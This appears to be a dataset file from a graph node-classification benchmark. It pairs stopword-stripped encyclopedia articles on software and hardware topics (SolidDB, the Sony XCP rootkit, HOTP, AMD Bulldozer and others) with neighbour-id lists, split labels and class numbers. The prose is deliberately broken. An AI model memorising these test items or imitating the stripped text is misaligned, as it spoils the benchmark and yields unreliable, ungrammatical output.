SolidDB:soliddb soliddb in-memory relational database management system developed sold unicom global soliddb delivers extreme speed persistent relational in-memory database meets performance reliability demands real-time applications unicom global known unicom government inc. american information technology hardware solutions company founded 1983 provide microcomputer software federal government united states 1986 worked local state federal government agencies 1996 registered url engaged e-commerce soliddb includes in-memory database well traditional disk based database employ sql interface high availability option in-memory disk based engines coexist inside server process single sql statement access data engines high availability option maintains two copies data synchronized times case system failure applications recover access soliddb less second without loss data soliddb easy deploy administer ability embedded directly applications run virtually unattended lower total cost-of-ownership historically used embedded database telecommunications equipment network software similar systems companies using soliddb include alcatel-lucent ericsson cisco systems emc corporation hewlett-packard nokia siemens ag nokia networks solid acquired ibm late 2007 privately held company founded helsinki finland 1992 solid sold unicom global 2014
[ 5384, 10921, 4781, 10286, 10413, 6834, 3219, 2901, 10389 ]
Test
7,947
2
Zero_Install:zero install zero install means distributing packaging software multiple operating systems linux unix-like macos windows rather normal method downloading software package extracting installing used accompanying use destructive updates privilege escalation packages distributed using zero install need run first time software accessed downloaded internet cached subsequently software accessed cache inside cache application unpacks directory application directory systems system intended used alongside distribution native package manager two advantages zero install popular packaging systems cross-platform root password needed install software packages installed system locations writable user instead requiring administrator access thus package installation affects user installing makes possible users able install run new software among disadvantages 0install fact applications often need rewrite packager e.g absolute paths may use among requirements quality 0install repo content varies may contain unmaintained software
[ 11525, 2310, 10760, 2955, 7435, 7181, 910, 9487, 2448, 8466, 788, 1813, 8213, 10900, 6680, 8476, 5670, 4775, 7847, 6828, 6446, 7983, 1842, 823, 2872, 6583, 3131, 700, 5819, 190, 10172, 3649, 10817, 9671, 5067, 3918, 463, 3667, 6227, 4951,...
Test
7,948
4
Multiscanning:multiscanning multiscanning running multiple anti-malware antivirus engines concurrently traditionally single engine actively scan system given time using multiple engines simultaneously result conflicts lead system freezes application failures however number security applications application suites optimized multiple engines work together testing agencies published results showing single antivirus engine 100 effective every malware threat engine uses different scanning methodologies updates malware definition files various frequencies using multiple engines increases likelihood catching malware affect system network
[ 9537, 7362, 2213, 1318, 11019, 3885, 6382, 8493, 4464, 3955, 2005, 10166, 3739, 156 ]
Train
7,949
4
Abuse_Reporting_Format:abuse reporting format abuse reporting format arf standard format reporting spam via email draft describing standard format feedback loop fbl reports posted yakov shafranovich april 2005 evolved current aol pioneered field 2003 initially used different format converted de facto standard 2008 feedback loops n't use arf january 2010 ietf chartered new working group working towards goal standardizing arf format wg called messaging abuse reporting format wg marf produced rfc 5965 2012 extended rfc 6591 rfc 6692 define failure reports reporting email authentication failures 2015 latter report type extended rfc 7489 define dmarc forensic reports arf format designed extensible providing generic spam reporting e.g users anti-spam center help desk opt-out operations format defines new mime type included codice_1 attachment includes least headers offending message although draft description acknowledges operators may choose modify redact portion privacy legal reasons recommends entire original email message attached including unmodified recipient address arf-encapsulated fbl report comes subject offending message much like bounce messages abuse report consists human readable part followed machine readable part original message machine readable part type codice_2 whose definition core draft extensibility achieved including feedback-type field characterizes report possible values field iana registry provided feedback-type well field names field name may either relevant type feedback specified type fields may appear multiple times example source-ip field containing ip address original message received may appear type fbl report removal-recipient field indicating email addresses removed may appear opt-out reports one times addition dkim-failure subtype iana registry example report email abuse follows note first three lines machine readable part required
[ 8224, 8130, 1667, 8133, 488, 3145, 6762, 1899, 8202, 8747, 914, 5012, 6261, 1495, 8093 ]
Test
7,950
9
XploRe:xplore xplore commercial statistics software package developed german software company md*tech around prof. dr. wolfgang härdle xplore discontinued 2008 last version 4.8 available download cost user interacted software via xplore programming language derived c programming language individual xplore programs called quantlets besides standard functions one- multidimensional data analysis focus non- semiparametric modelling statistics financial markets xplore quantlet client users able run xplore java applet web browser applet sent user commands via tcp/ip based communication protocol xplore quantlet server computed necessary results sent back client technology also used enrich electronic books interactive examples
[ 5129, 7945, 3980, 2317, 6797, 2457, 7580, 7326, 6962, 6718, 5830, 5703, 4808, 5833, 5450, 8262, 2000, 9944, 2652, 10848, 4840, 363, 5612, 7924, 2045 ]
Validation
7,951
8
Goanna_(software):goanna software goanna open-source browser engine fork mozilla gecko used pale moon browser basilisk browser uxp-based applications fork k-meleon browser also uses goanna independent fork gecko first released january 2016 project founder lead developer m. c. straver technical legal motives context pale moon increasing divergence firefox two significant aspects goanna divergence rust language components added gecko mozilla quantum project applications use goanna always run single-process mode whereas firefox became multi-process application core web standards supported goanna
[ 1664, 6791, 9736, 1295, 2836, 10006, 11418, 9757, 1713, 7346, 7861, 11449, 5054, 7543, 9152, 9281, 4423, 10057, 2893, 3407, 4048, 7889, 5078, 6231, 11223, 8923, 10078, 482, 10722, 487, 8169, 10860, 6133, 119, 4728, 5114, 8443, 637, 6143 ]
Validation
7,952
1
BioSearch:biosearch biosearch web application developed manage marine biodiversity data indian waters recent demand indian marine biodiversity information increased manifolds owing mainly realization marine biodiversity potential biotechnology pollution control energy generation however recently web based open access database could provide comprehensive information indian coastal biodiversity lacking biosearch created address need biosearch enables access anyone anywhere time biosearch search page user search information organism name location presence recorded ecology economic importance user obtain information organism names image description ecology economic importance also referred literature biosearch web-based application user-end requirements minimal basic requirement includes computer system internet connection web browser biosearch designed enable easy access organism pages lowest internet connection speeds particularly important parts country rely dial–up 56kbit/s internet connections various applications biosearch anticipated biosearch basic level used fishermen information fish catch general public learn marine biodiversity browsing name indices students lecturers use description lifecycle reproduction taxonomic literature information project work activities conservationist obtain organism distribution diversity particular area iucn red list status organism biotechnologist use biosearch know distribution biotechnologically important organism may help future specimen collection advance applications anticipated fields pisciculture remote sensing geographical information systems gis ecological modeling
[]
Test
7,953
7
Imonggo:imonggo imonggo free cloud-based pos small businesses released international tech company movmento pte ltd. 2009 first free web-based pos system available small business imonggo used macos configured safari also supports major internet browsers internet explorer firefox google chrome imonggo version 2.0 first launched 2009 movmento pte ltd.. movmento saas company headquarters singapore sales marketing divisions united states research development teams located philippines imonggo released ipad app january 4 2013 app allows users sell items offline use ipad tablets showcase products customers imonggo downloadable software users must create account online accessed anywhere internet connection imonggo configured pos system well web-based retail management solution allows retailers manage hundreds stores inventory well providing sales analysis business intelligence imonggo allows stores create multiple users well business subsidiaries software also hack-proof ssl encryption protect data also uses several servers different geographical areas back data order ensure business data company lost destroyed software also support peripherals barcode scanners label printers cash drawers check readers receipt printers signature capture pads imonggo partnered authorize.net credit card processing also software partner star micronics co. ltd. imonggo awarded best business software award point sales software category apex 2009 2011 also listed one top 90 cloud computing companies watch
[ 467, 5078, 7983 ]
Test
7,954
3
SPIM:spim spim mips processor simulator designed run assembly language code architecture program simulates r2000 r3000 processors written james r. larus professor university wisconsin–madison mips machine language often taught college-level assembly courses especially using textbook computer organization design hardware/software interface david a. patterson john l. hennessy name simulator reversal letters mips spim simulators available windows pcspim mac os x unix/linux-based xspim operating systems release 8.0 january 2010 simulator licensed standard bsd license january 2011 major release version 9.0 features qtspim new user interface built cross-platform qt ui framework runs windows gnu/linux mac os x version project also moved sourceforge better maintenance precompiled versions qtspim linux 32-bit windows mac os x well pcspim windows provided spim simulator comes rudimentary operating system allows programmer usage common used functions comfortable way functions invoked syscall-instruction os acts depending values specific registers spim os expects label named main handover point os-preamble mars mips assembler runtime simulator java-based ide mips assembly programming language alternative spim initial release 2005 active development imperas suite embedded software development tools mips architecture uses just-in-time compilation emulation simulation technology simulator initially released 2008 active development 30 open source models mips 32 bit 64 bit cores
[ 477, 8609, 7234, 6250, 5612, 6797, 783, 7983, 5873, 5492, 823, 3421 ]
None
7,955
4
Norton_Security:norton security norton security developed symantec corporation cross-platform security suite provides subscription-based real-time malware prevention removal addition identity theft protection performance tuning tools features include personal firewall email spam filtering phishing protection released september 23 2014 part symantec streamlined norton line replaces long-running norton internet security flagship antivirus product effort streamline large confusing norton product line symantec combined nine standalone norton products one all-purpose suite norton security supersedes norton internet security norton 360 overlapping release cycle saw version 22 initial release former final release latter however version 22 norton 360 norton internet security updates opposed full releases terms similarities differences predecessors norton security retains components norton internet security including antivirus firewall identity theft components adds optimization tools norton 360 norton security available three editions norton security standard one license valid single device norton security deluxe five licenses norton security premium offers ten licenses 25 gb hosted online backup premium subscription symantec parental control system editions include protection windows os x android ios devices however features may vary based operating system
[ 5512, 6797, 10903, 6297, 5924, 6565, 1708, 7983, 8368, 8753, 2870, 11065, 3520, 2378, 8398, 7515, 9569, 3941, 4464, 6643, 10872, 8572, 9983 ]
Test
7,956
0
Robby_Garner:robby garner robby garner born 1963 american natural language programmer software developer 1998 1999 loebner prize contests program called albert one listed 2001 guinness book world records written human computer program native cedartown georgia robby attended cedartown high school worked father television repair shop began programming family business age 15 commander afjrotc squadron junior high school attending joint-enrollment college classes local community college forming software company called robitron software research inc. 1987 father robert j. garner sister pam worked software developer 1997 father retired company disbanded one first web chatterbots named max headcold written garner 1995 max served two purposes collect data web chat behavior entertain customers fringeware online bookstore program eventually implemented java package called jfred written paco nathan based c++ fred cgi program influences stanford various corporations garner nathan took part world largest online turing test 1998 jfred program perceived human 17 participants computational behaviorist term coined dr. thomas whalen 1995 garner first attempts simulating conversation involved collections internet chat viewed sequence stimuli responses kevin copple ellaz systems collaborated garner several projects including copple ella garner contributed voice recordings music garner copple believe intelligence may built one facet time rather depending general purpose theory emerge competing six loebner prize contests used competition way test prototypes judges year winning contest twice 1998 1999 program called albert one began collaborating software developers variety conversational systems garner created robitron yahoo group 2002 forum virtual watering hole loebner prize contest participants discussion related topics multifaceted approach presented colloquium conversational systems november 2005 involves multiple chat bots working control master control program using technique strengths various web agents may united control java applet servlet control program categorizes stimuli delegates responses programs hierarchy spin-off technique turing hub automated turing test featuring four top loebner prize contest competitors
[]
Test
7,957
4
Extended_Copy_Protection:extended copy protection extended copy protection xcp software package developed british company first 4 internet 20 november 2006 changed name fortium technologies ltd sold copy protection digital rights management drm scheme compact discs used cds distributed sony bmg sparked 2005 sony bmg cd copy protection scandal context also known sony rootkit security researchers beginning mark russinovich october 2005 described program functionally identical rootkit computer program used computer intruders conceal unauthorised activities computer system russinovich broke story sysinternals blog gained attention media researchers ultimately led civil lawsuit criminal investigations forced sony discontinue use system sony eventually recalled cds contained xcp system web-based uninstaller investigated noted security researchers ed felten alex halderman stated activex component used removing software exposed users far significant security risks including arbitrary code execution websites internet version software used sony cds one marketed xcp-aurora first time user attempts play cd windows system user presented eula refuse accept cd ejected accept software installed eula mention installed hidden software software remain resident user system intercepting accesses cd drive prevent media player ripper software one included xcp-aurora accessing music tracks sony cd obvious way uninstall program provided attempting remove software deleting associated files manually render cd drive inoperable due registry settings program altered however soon discovered software could easily defeated merely using permanent marker draw dark border along edge disk following mark russinovich publication findings security researchers quick publish analyses many findings highly critical sony first 4 internet specifically software found conceal activity manner rootkit expose users follow-on harm viruses trojans xcp cloaking technique makes processes names starting codice_1 invisible used malware piggybacking ensure hidden user view first malicious trojan hide via xcp discovered 10 november 2005 according report bitdefender antivirus company follow-up research felten halderman showed web-based uninstaller sony later offered software contains critical security problems software installs activex component allows web site run software user computer without restriction component used first 4 internet web site download run uninstaller remains active afterward allowing web site user visits take computer since specific microsoft windows xcp effect operating systems linux bsd os/2 solaris os x meaning users systems suffer potential harm software also impeded ripping copying normal music tracks cd discs involved sony scandal contained competing technology mediamax sunncomm attempts install kernel extension mac os x however due permissions mac os x widespread infections among mac users although russinovich first publish rootkit researchers discovered around time either still analyzing chose disclose anything sooner due chilling effect anti-circumvention clause digital millennium copyright act shortly independent researchers broke story security software vendors followed releasing detailed descriptions components xcp well software remove codice_2 cloaking component hand software yet released remove cd-rom filter driver component computer associates makers pestpatrol anti-spyware software characterize xcp software trojan horse rootkit xcp.sony.rootkit installs drm executable windows service misleadingly names service plug play device manager employing technique commonly used malware authors fool everyday users believing part windows approximately every 1.5 seconds service queries primary executables associated processes running machine resulting nearly continuous read attempts hard drive shown shorten drive lifespan furthermore xcp.sony.rootkit installs device driver specifically cd-rom filter driver intercepts calls cd-rom drive process included music player player.exe attempts read audio section cd filter driver inserts seemingly random noise returned data thus making music unlistenable xcp.sony.rootkit loads system filter driver intercepts calls process directory registry listings even unrelated sony bmg application rootkit driver modifies information visible operating system order cloak sony bmg software commonly referred rootkit technology furthermore rootkit affect xcp.sony.rootkit files rootkit hides every file process registry key beginning codice_1 represents vulnerability already exploited hide world warcraft ring0 hacks time writing could potentially hide attacker files processes access infected system gained computer associates announced november 2005 anti-spyware product pestpatrol would able remove sony software one month later microsoft released update windows malicious software removal tool could clean f4irootkit malware somewhat slow incomplete response antivirus companies however questioned bruce schneier information security expert author security articles texts including secrets lies article wired news mr. schneier asks happens creators malware collude companies hire protect us malware answer users lose ... dangerous damaging rootkit gets introduced wild half million computers get infected anyone anything beginning early august 2005 windows users reported crashes related program called aries.sys inexplicably unable find file computers file known part xcp call help host leo laporte said experienced rise reports missing cd-rom drives symptom unsuccessful attempts remove xcp security researcher dan kaminsky used dns cache analysis determine 568,000 networks worldwide may contain least one xcp-infected computer kaminsky technique uses fact dns nameservers cache recently fetched results xcp phones home specific hostname finding dns servers carry hostname cache kaminsky able approximate number networks affected release data kaminsky learned as-yet undetermined number enhanced cds without rootkit also phone home address rootkit-affected discs use infection rates still active investigation according analyst firm gartner xcp suffers flaw implementing drm drm technology current future tries apply drm audio cds designed played stand-alone cd players according gartner installation xcp drm software relies cd multi-session application ink via ordinary felt-tip marker outer edge disk renders data track cd unreadable thereby causing pc treat disc ordinary single-session music cd slysoft anydvd program removes copy protections standard hi-definition video discs also defeats drm audio cds active audio cd inserted anydvd blocks pc accessing session audio rendering data sessions unreadable preventing installation malware xcp much speculation extent actions taken software violation various laws unauthorized tampering computers laws regarding invasion privacy spyware subject sony first 4 internet legal liability states california new york texas well italy already taken legal action companies class action lawsuits likely however mere act attempting view remove software order determine prevent alteration windows would theoretically constitute civil criminal offense certain anti-circumvention legislation controversial digital millennium copyright act united states electronic frontier foundation fred von lohmann also heavily criticised xcp eula calling legalese rootkit one primary reasons xcp experiment lies issue adding drm legacy standard problems explored professor randal picker professor law university chicago school law article mistrust-based digital rights management published volume 5 journal telecommunications high technology law cds incapable updating legacy hardware stand-alone cd players lack ability change upgrade firmware order read drm thus drm must added interfere function legacy players yet still work cd placed computer professor picker analyzes four main issues add-on drm first problem demonstrated xcp example capable consumers simply by-pass drm turning autorun prevented rootkit installation thus invalidated drm scheme second problem consumer reaction adding drm legacy product like music cds traditionally rights management scheme infuriate consumers professor picker points wake negative publicity surrounding sony add-on drm amazon.com began alerting customers sony cds contained xcp customers could avoid drm entirely negating effectiveness third problem lies legal response eff well state attorneys general investigated brought suit sony xcp program professor picker analyze legal merits suits cost litigation potentially outweighs benefit attempting add-on drm fourth final problem lies end user license agreement attempted enforced add-on drm ability actually enforce agreements add-on drm limited mere fact without active registration tracking cds company one enforce therefore expected benefit enforcing eula violators actually non-existent costs however implementing add-on drm scheme form state federal investigations private lawsuits negative publicity consumer backlash technical limitations far outweighs benefits researcher sebastian porst matti nikki number software experts published evidence xcp software infringes copyright lame mp3 encoder mpglib faac id3lib id3 tag reading writing mpg123 vlc media player princeton researcher alex halderman discovered nearly every xcp cd code uses modified version jon johansen drms software allows open apple computer fairplay drm included found code inactive fully functional could use insert songs fairplay drms mpg123 vlc licensed gnu general public license gpl software found like lame licensed terms gnu lesser general public license lgpl also free software claims correct sony/bmg distributing copyrighted material illegally jon johansen wrote blog talking lawyer thinks sue however opinions advice given wrong lame developers put open letter sony/bmg online copyright violations sony could accused include sony already provides version id3lib source code web site unrelated xcp national public radio program thomas hesse president sony bmg global digital business division asked people think n't even know rootkit care explained software designed protect cds unauthorized copying ripping sony also contends component malicious compromise security alleviate concerns users may program posing potential security vulnerabilities update released enable users remove rootkit component computers uninstaller xcp-aurora available sony-bmg web site original uninstaller different analysis uninstaller published mark russinovich initially uncovered xcp titled sony dangerous decloaking patch eulas phoning home obtaining original uninstaller requires one use specific browser microsoft internet explorer fill online form email address receive email install patch fill second online form receive link uninstaller link personalized work multiple uninstalls furthermore sony privacy policy states address used promotions given affiliates reputable third parties may contact directly also reported original uninstaller might security problems would allow remote code execution sony uninstall page would attempt install activex control displayed internet explorer activex control marked safe scripting means web page utilize control methods methods provided control dangerous may allowed attacker upload execute arbitrary code 11 november 2005 sony announced would suspend manufacturing cds using xcp system precautionary measure sony bmg temporarily suspending manufacture cds containing xcp technology said statement also intend re-examine aspects content protection initiative sure continues meet goals security ease consumer use sony bmg added followed comments stewart baker department homeland security assistant secretary policy took drm manufacturers task reported washington post remark clearly aimed directly sony labels stewart continued important remember intellectual property computer pursuit protection intellectual property important defeat undermine security measures people need adopt days according new york times sony bmg said 4.7 million cds containing software shipped 2.1 million sold 52 albums distributed sony-bmg contained xcp 14 november 2005 sony announced recalling affected cds plans offer exchanges consumers purchased discs electronic frontier foundation published original list 19 titles 9 november 2005 15 november 2005 register published article saying may many 47 titles sony bmg says 52 xcp cds amazon says treating xcp cds defective merchandise offer refund shipping long customer specifies request various adverse side-effects xcp rationally viewed defects part apparent intended function xcp view skirts substantive issue whether sony transgressed computer owners intentionally modifying computer systems without consent
[ 1315, 8932, 1509, 10756, 839, 2887, 10026, 11, 6797, 2128, 10448, 823, 10392, 3163, 8797, 9791 ]
None
7,958
5
HMAC-based_One-time_Password_algorithm:hmac-based one-time password algorithm hmac-based one-time password algorithm hotp one-time password otp algorithm based hash-based message authentication codes hmac cornerstone initiative open authentication oath hotp published informational ietf rfc 4226 december 2005 documenting algorithm along java implementation since algorithm adopted many companies worldwide see hotp algorithm freely available open standard hotp algorithm provides method authentication symmetric generation human-readable passwords values used one authentication attempt one-time property leads directly single use counter value parties intending use hotp must establish typically specified authenticator either accepted authenticated parties compute hotpvalue authenticator checks locally-generated value value supplied authenticated authenticator authenticated increment counter independently latter may increase ahead former thus resynchronisation protocol wise rfc4426 n't actually require make recommendation simply authenticator repeatedly try verification ahead counter window size authenticator counter continues forward value verification succeeds requires actions authenticated recommendation made persistent throttling hotpvalue verification take place address relatively small size thus vulnerability brute force attacks suggested verification locked small number failed attempts failed attempt attracts additional linearly-increasing delay 6-digit codes commonly provided proprietary hardware tokens number vendors informing default value truncation extracts 31 bits formula_1 ≈ 9.3 decimal digits meaning 10 10th digit providing less extra variation taking values 0 1 2 i.e. 0.3 digits verification authenticator authenticate simply generating next hotpvalue returning authenticated generate hotpvalue verify note counters guaranteed synchronised point process hotpvalue human-readable design output -digit decimal number without omission leading 0s value least significant base-10 digits hotp hotp truncation hash-based message authentication code hmac counter c key k hash function h truncation first takes 4 least significant bits mac uses offset index used select 31 bits mac starting bit 1 note 31 bits single bit short 4-byte word thus value placed inside word without using sign bit significant bit done definitely avoid modular arithmetic negative numbers many differing definitions implementations hardware software tokens available various vendors see references hardware tokens implementing oath hotp tend significantly cheaper competitors based proprietary algorithms 2010 oath hotp hardware tokens purchased marginal price products used strong passwords well oath hotp software tokens available nearly major mobile/smartphone platforms j2me android iphone blackberry maemo macos windows mobile although reception computer press negative 2004 2005 ietf adopted hotp rfc 4226 december 2005 various vendors started produce hotp compatible tokens and/or whole authentication solutions according paper strong authentication entitled road map replacing passwords otp authentication published burton group division gartner inc. 2010 gartner expectation hardware otp form factor continue enjoy modest growth smartphone otps grow become default hardware platform time
[ 2208, 9732, 3309, 10961, 1083, 4575 ]
Validation
7,959
2
TR-DOS:tr-dos tr-dos disk operating system zx spectrum beta disc beta 128 disc interfaces tr-dos beta disc developed technology research ltd uk 1984 became standard disk releases zx spectrum especially modern programs made tr-dos opposed disk systems current emulators support tr-dos disk images formats .trd .scl clone interface also used russian pentagon scorpion machines latest official firmware version 5.03 1986 unofficial versions various enhancements bug-fixes released since 1990 latest 6.10e 2006 tr-dos handles ss/ds sd/dd floppy disks modern versions support ram disk versions support hard disks
[ 7823, 4409, 2933, 5359 ]
Test
7,960
4
CyberCIEGE:cyberciege cyberciege serious game designed teach network security concepts development sponsored u.s. navy used training tool agencies u.s. government universities community colleges cyberciege covers broad range cybersecurity topics players purchase configure computers network devices keep demanding users happy e.g. providing internet access protecting assets variety attacks game includes number different scenarios focus basic training awareness others advanced network security concepts scenario development kit available creating customizing scenarios network security components include configurable firewalls vpn gateways vpn clients link encryptors authentication servers workstations servers include access control lists acls may configured operating systems enforce label-based mandatory access control policies players deploy public key infrastructure pki -based cryptography protect email web traffic vpns game also includes identity management devices biometric scanners card readers control access workstations physical areas cyberciege game engine consumes “ scenario development language ” describes scenario terms users goals assets values initial state scenario terms pre-existing components conditions triggers provide flow scenario game engine defined enough fidelity host scenarios ranging e-mail attachment awareness cyber warfare cyberciege scenarios place player situations player must make information assurance decisions interactive simulation illustrates potential consequences player choices terms attacks information assets disruptions authorized user access assets game employs hyperbole means engaging students scenario thus simulation intended always identify actual consequences specific choices game confronts student problems conflicts questions considered developing implementing security policy game designed construction management simulation set three-dimensional virtual world players build networks observe virtual users thoughts scenario divided multiple phases phase includes one objectives player must achieve prior moving next phase players view status virtual user ’ success achieving goals i.e. accessing enterprise assets via computers networks unproductive users express unhappy thoughts utter comic book style speech bubbles bang keyboards players see consequences attacks lost money pop-up messages video clips burning computers cyberciege includes sophisticated attack engine assesses network topologies component configurations physical security user training procedural security settings attack engine weighs resultant vulnerabilities attacker motives compromise assets network—and motive may vary asset thus assets might defended via firewall assets might require air gap high assurance protection mechanisms attack types include trojan horses viruses trap doors denial service insiders i.e. bribed users lack background checks un-patched flaws physical attacks attack engine coupled economy engine measures virtual user ’ ability achieve goals i.e. read write assets using computers networks combination supports scenarios illustrate real-world trade-offs use air-gaps versus risks cross-domain solutions accessing assets classified unclassified networks game engine includes defined set assessable conditions resultant triggers allow scenario designer provide players feedback e.g. bubble speech characters screen tickers pop-up messages etc transition game new phases fidelity game engine intended high enough players make meaningful choices respect deploying network security countermeasures high engulf player administrative minutiae cyberciege illustrates abstract functions technical protection mechanisms configuration-related vulnerabilities example attack might occur particular firewall port left open specific software service patched cyberciege designed provide fairly consistent level abstraction among various network computer components technical countermeasures seen considering several cyberciege game components cyberciege firewalls include network filters let players block traffic selected application “ ports ” e.g. telnet players configure filters different network interfaces different traffic directions lets players see consequences leaving ports open e.g. attacks allows players experience need open ports e.g. one characters might unable achieve goal unless filter configured allow ssh traffic cyberciege includes vpn gateways computer based vpn mechanisms players configure identify characteristics protection e.g. encryption authentication neither provided network traffic depending source destination allows cyberciege illustrate risks associated providing unprotected internet access workstation vpn tunnel corporate network network components e.g. workstations include configuration choices related type component cyberciege lets players select consequential password policies procedural configuration settings
[ 3521, 939, 8998 ]
Test
7,961
4
SkyGrabber:skygrabber skygrabber software russian company skysoftware accepts input digital satellite tuner card hard drive recording used iraqi insurgents group kata'ib hezbollah intercept mq-1 predator drone video feeds encrypted encryption feeds removed performance reasons
[ 9440, 1064, 6797, 7983, 9233 ]
Test
7,962
8
Helicon_Ape:helicon ape helicon ape piece software helicon tech destined introduce apache functionality iis web servers helicon ape realized asp.net module iis 7 higher implementing functionality 35 apache modules allows using apache configurations leaving syntax intact iis extend standard iis capabilities aside realization apache modules helicon ape possesses proprietary modules server-side debugging profiling mod_developer seo optimization mod_linkfreeze hotlinking protection mod_hotlink helicon ape gui interface see screenshot allows easy configs editing directives auto-completion spell-check features supported browsing includes regular expressions tester password generation utility list modules currently supported helicon ape helicon ape designed specifically benefit advantages iis 7 architecture 100 operability ensured iis 7 higher windows vista windows server 2008 windows 7 windows server 2008 r2 iis6 windows server 2003 helicon ape offers slightly limited functionality see compatibility chart three license types available helicon ape
[ 225, 865, 4074, 6797, 7983, 5012, 4439, 8639 ]
Test
7,963
3
Bulldozer_(microarchitecture):bulldozer microarchitecture amd bulldozer family 15h microprocessor microarchitecture fx opteron line processors developed amd desktop server markets bulldozer codename family microarchitectures released october 12 2011 successor k10 microarchitecture bulldozer designed scratch development earlier processors core specifically aimed computing products tdps 10 125 watts amd claims dramatic performance-per-watt efficiency improvements high-performance computing hpc applications bulldozer cores bulldozer cores support instruction sets implemented intel processors available introduction including sse4.1 sse4.2 aes clmul avx well new instruction sets proposed amd abm xop fma4 f16c bulldozer gen4 excavator supports avx2 instruction sets according amd bulldozer-based cpus based globalfoundries 32 nm silicon insulator soi process technology reuses approach dec multitasking computer performance arguments according press notes balances dedicated shared computer resources provide highly compact high units count design easily replicated chip performance scaling words eliminating redundant elements naturally creep multicore designs amd hoped take better advantage hardware capabilities using less power bulldozer-based implementations built 32nm soi hkmg arrived october 2011 servers desktops server segment included dual chip 16-core opteron processor codenamed interlagos socket g34 single chip 4 6 8 cores valencia socket c32 zambezi 4 6 8 cores targeted desktops socket am3+ bulldozer first major redesign amd ’ processor architecture since 2003 firm launched k8 processors also features two 128-bit fma-capable fpus combined one 256-bit fpu design accompanied two integer clusters 4 pipelines fetch/decode stage shared bulldozer also introduced shared l2 cache new architecture amd calls design module 16-core processor design would feature eight modules operating system recognize module two logical cores modular architecture consists multithreaded shared l2 cache flexfpu uses simultaneous multithreading physical integer core two per module single threaded contrast intel hyperthreading two virtual simultaneous threads share resources single physical core bulldozer introduced clustered multithreading cmt parts processor shared two threads parts unique thread terms hardware complexity functionality bulldozer cmt module equal dual-core processor integer power either single-core processor dual core floating-point power depending whether code saturated floating point instructions threads running cmt module whether fpu performing 128-bit 256-bit floating point operations reason two integer cores floating-point unit consisting pair 128-bit fmac execution units cmt simpler similar design philosophy smt designs try utilize execution units efficiently either method two threads compete execution pipelines loss performance one threads due dedicated integer cores bulldozer family modules performed roughly like dual core dual thread processor sections code either wholly integer mix integer floating point yet due smt use shared floating point pipelines module would perform similarly single core dual thread smt processor smt2 pair threads saturated floating point instructions last two comparisons make assumption comparison processor possesses equally wide capable execution core integer-wise floating-point wise respectively cmt smt peak effectiveness running integer floating point code pair threads cmt stays peak effectiveness working pair threads consisting integer code smt one threads underperform due competition integer execution units disadvantage cmt greater number idle integer execution units single threaded case single threaded case cmt limited use half integer execution units module smt imposes limit large smt core integer circuitry wide fast two cmt cores could theory momentarily twice integer performance single thread case realistically general code whole pollack rule estimates speedup factor formula_1 approximately 40 increase performance cmt processors typical smt processor similar efficient shared use l2 cache pair threads longer pipeline allowed bulldozer family processors achieve much higher clock frequency compared k10 predecessors increased frequencies throughput longer pipeline also increased latencies increased branch misprediction penalties issue widths peak instruction executions per cycle jaguar k10 bulldozer core 2 3 4 respectively made bulldozer superscalar design compared jaguar/bobcat however due k10 somewhat wider core addition lack refinements optimizations first generation design bulldozer architecture typically performed somewhat lower ipc compared k10 predecessors refinements made piledriver steamroller ipc bulldozer family distinctly began exceed k10 processors phenom ii first revenue shipments bulldozer-based opteron processors announced september 7 2011 fx-4100 fx-6100 fx-8120 fx-8150 released october 2011 remaining fx series amd processors released end first quarter 2012 major sources cpu-world xbit-labs two series bulldozer-based processors servers opteron 4200 series socket c32 code named valencia four modules opteron 6200 series socket g34 code named interlagos 8 modules november 2015 amd sued california consumers legal remedies act unfair competition law allegedly misrepresenting specifications bulldozer chips class-action lawsuit filed 26 october us district court northern district california claims bulldozer module fact single cpu core dual-core traits rather true dual-core design 24 october 2011 first generation tests done phoronix confirmed performance bulldozer cpu somewhat less expected many tests cpu performed level older generation phenom 1060t performance later substantially increased various compiler optimizations cpu driver fixes released first bulldozer cpus met mixed response discovered fx-8150 performed poorly benchmarks highly threaded falling behind second-generation intel core i* series processors matched even outperformed amd phenom ii x6 lower clock speeds highly threaded benchmarks fx-8150 performed par phenom ii x6 intel core i7 2600k depending benchmark given overall consistent performance intel core i5 2500k lower price results left many reviewers underwhelmed processor found extremely power-hungry load especially overclocked compared intel sandy bridge 13 october 2011 amd stated blog community feel product performance meet expectations showed benchmarks actual applications outperformed sandy bridge i7 2600k amd x6 1100t january 2012 microsoft released two hotfixes windows 7 server 2008 r2 marginally improve performance bulldozer cpus addressing thread scheduling concerns raised release bulldozer 6 march 2012 amd posted knowledge base article stating compatibility problem fx processors certain games widely used digital game distribution platform steam amd stated provided bios update several motherboard manufacturers namely asus gigabyte technology msi asrock would fix problem september 2014 amd ceo rory read conceded bulldozer design game-changing part amd live design four years july 29 2015 microsoft released direct x 12 api dx12 windows 10 operating system api allows programmers achieve greater parallelism notably graphics intensive game titles dx12 titles make better use higher core counts high thread count processor bulldozer family fx-6300 fx-8100 series chips extending usability systems windows 10 31 august 2011 amd group well-known overclockers including brian mclachlan sami mäkinen aaron schradin simon solotko managed set new world record cpu frequency using unreleased overclocked fx-8150 bulldozer processor day record sat 8.309 ghz bulldozer combined liquid helium cooling reached new high 8.429 ghz record since overtaken 8.58 ghz andre yang using liquid nitrogen august 22 2014 using fx-8370 piledriver stilt team finland achieved maximum cpu frequency 8.722 ghz piledriver amd codename improved second-generation microarchitecture based bulldozer amd piledriver cores found socket fm2 trinity richland based series apus cpus socket am3+ vishera based fx-series cpus piledriver last generation bulldozer family available socket am3+ available l3 cache piledriver processors available fm2 mobile variant sockets come l3 cache l2 cache last-level cache fm2/fm2+ processors steamroller amd codename third-generation microarchitecture based improved version piledriver steamroller cores found socket fm2+ kaveri based series apus cpus excavator codename fourth-generation bulldozer core excavator implemented 'carrizo a-series apus athlon x4 cpus
[ 3586, 6151, 5645, 7699, 8231, 2088, 2094, 7218, 2113, 7234, 2140, 2655, 4194, 3175, 5223, 7783, 8810, 4205, 1137, 630, 6774, 9337, 7802, 8322, 8327, 10375, 10383, 7313, 153, 9369, 2719, 4767, 6815, 2210, 5798, 4270, 7858, 4286, 2764, 5329...
Validation
7,964
2
